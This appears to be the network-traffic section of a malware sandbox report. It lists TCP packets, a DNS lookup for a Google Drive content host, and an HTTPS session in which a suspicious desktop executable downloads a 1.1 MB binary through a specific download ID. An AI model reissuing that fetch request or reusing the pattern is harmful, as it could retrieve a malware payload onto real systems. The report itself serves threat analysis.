                                                                    Nov 26, 2024 08:12:21.709018946 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.709225893 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.709279060 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.709291935 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.710154057 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.710210085 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.710222006 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.722589970 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.722664118 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.722678900 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.722937107 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.722990036 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.723001003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.724595070 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.724646091 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.724659920 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.732472897 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.732531071 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.732544899 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.733743906 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.733797073 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.733810902 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.734644890 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.734700918 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.734713078 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.743159056 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.743212938 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.743227959 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.744180918 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.744227886 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.744261980 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.744283915 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.744334936 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.744951010 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.755173922 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.755235910 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.755254984 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.756196022 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.756242990 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.756256104 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.756859064 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.756931067 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.756958961 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.767911911 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.767956972 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.767970085 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.768985033 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.769027948 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.769033909 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.769829035 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.769876957 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.769908905 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.777230024 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.777278900 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.777295113 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.778172970 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.778232098 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.778237104 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.786530018 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.786576986 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.786581993 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.787065029 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.787113905 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.787117958 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.787971973 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.788024902 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.788037062 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.788825035 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.788876057 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.788891077 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.795869112 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.795923948 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.795938015 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.796791077 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.796844959 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.796857119 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.804769039 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.804826021 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.804852962 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.805448055 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.805500031 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.805505991 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.805521011 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.805579901 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.806092978 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.813992977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.814050913 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.814079046 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.814532995 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.814596891 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.814600945 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.814614058 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.814665079 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.815557003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.829159975 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.829209089 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.829214096 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.829720020 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.829766989 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.829771042 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.830599070 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.830645084 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.830650091 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.843605042 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.843699932 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.843758106 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.843765020 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.843810081 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.843976021 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.844883919 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.844928026 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.844932079 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.863744974 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.863841057 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.863847971 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.863989115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.864032984 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.864037037 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.864933968 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.864979982 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.864984035 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.872837067 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.872927904 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.872932911 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.873147011 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.873194933 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.873199940 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.874877930 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.874929905 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.874960899 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.874968052 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.875005960 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.886212111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.886754036 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.886811972 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.886816978 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.887556076 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.887599945 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.887603998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.901176929 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.901216984 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.901237011 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.901243925 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.901283026 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.901596069 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.902488947 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.902555943 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.902560949 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.914469004 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.914571047 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.914577961 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915026903 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915071011 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.915076017 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915823936 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.915867090 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.915872097 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.924582958 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.924642086 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.924647093 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925029039 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925071955 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.925077915 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925880909 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.925920010 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.925924063 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.934912920 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.934978962 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.934986115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.935817003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.935866117 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.935870886 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.936755896 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.936805964 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.936811924 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.946616888 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.946717978 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.946731091 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.947575092 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.947626114 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.947634935 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.948457003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.948499918 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.948503971 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958003998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958077908 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.958084106 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958513021 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958566904 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.958573103 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.960129023 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.960175991 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.960181952 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969033003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969113111 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.969121933 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969474077 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969518900 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.969525099 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.971122980 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.971168041 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.971174002 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.978779078 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.978841066 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.978847027 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.979994059 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.980043888 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.980050087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.980887890 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.980935097 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.980940104 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.987620115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.987696886 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.987703085 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.988075972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.988123894 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.988130093 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.989742994 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.989795923 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.989800930 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.996819019 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.996876955 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.996882915 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998024940 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998075008 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.998080969 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998923063 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998970032 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.998975039 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.006495953 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.006555080 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.006560087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.007407904 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.007466078 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.007469893 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021286011 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021353006 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.021358013 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021709919 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021768093 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.021771908 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.022578001 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.022628069 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.022633076 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.035593033 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.035674095 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.035679102 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.036122084 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.036180973 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.036185980 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065408945 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065442085 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065448999 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065498114 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.065507889 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065552950 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.065581083 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.093779087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.093810081 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.093889952 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.093902111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.093911886 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.117199898 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.117238998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.117322922 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.117333889 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.117363930 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.127551079 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127582073 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127624035 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.127633095 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127688885 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.127765894 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127826929 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127870083 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.128632069 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.128648996 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.128668070 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.128673077 CET44349706142.250.181.129192.168.2.8

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 26, 2024 08:12:14.071011066 CET5601253192.168.2.81.1.1.1
                                                                    Nov 26, 2024 08:12:14.209933996 CET53560121.1.1.1192.168.2.8

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 26, 2024 08:12:14.071011066 CET192.168.2.81.1.1.10x98a0Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 26, 2024 08:12:14.209933996 CET1.1.1.1192.168.2.80x98a0No error (0)drive.usercontent.google.com142.250.181.129A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • drive.usercontent.google.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.849706142.250.181.129443520C:\Users\user\Desktop\nft438A5fN.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-11-26 07:12:16 UTC207OUTGET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                    Host: drive.usercontent.google.com
                                                                    2024-11-26 07:12:20 UTC4918INHTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Content-Security-Policy: sandbox
                                                                    Content-Security-Policy: default-src 'none'
                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                    X-Content-Security-Policy: sandbox
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                    Cross-Origin-Resource-Policy: same-site
                                                                    X-Content-Type-Options: nosniff
                                                                    Content-Disposition: attachment; filename="222_Wuqtggvoyft"
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Credentials: false
                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1118012
                                                                    Last-Modified: Sun, 06 Oct 2024 20:54:40 GMT
                                                                    X-GUploader-UploadID: AFiumC7_j7Rl2PTrVvosEB1XKitNo_OYFi3moUvvpEUjJVapmgS0pDQBw6Truuv8dugDQe-HCf7MCvn0zg
                                                                    Date: Tue, 26 Nov 2024 07:12:19 GMT
                                                                    Expires: Tue, 26 Nov 2024 07:12:19 GMT
                                                                    Cache-Control: private, max-age=0
                                                                    X-Goog-Hash: crc32c=XynV0g==
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
